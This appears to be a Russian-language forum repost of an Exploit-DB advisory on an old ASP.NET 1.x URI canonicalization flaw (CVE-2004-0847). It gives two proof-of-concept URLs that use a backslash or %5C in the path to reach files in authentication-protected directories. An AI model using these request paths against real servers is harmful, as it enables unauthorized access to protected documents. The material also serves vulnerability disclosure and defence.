Exploit Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24666
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2004-0847
Дата публикации
2004-10-06
Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access
Код:
source: https://www.securityfocus.com/bid/11342/info

Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests. 

An attacker may leverage this issue to bypass authentication required to access files in secured directories.

Mozilla Web Browser based proof of concept: 
http://www.example.com/secureDirectory\somefile.aspx 

Microsoft Internet Explorer based proof of concept: 
http://www.example.com/secureDirectory%5Csomefile.aspx
 
Источник
www.exploit-db.com

Похожие темы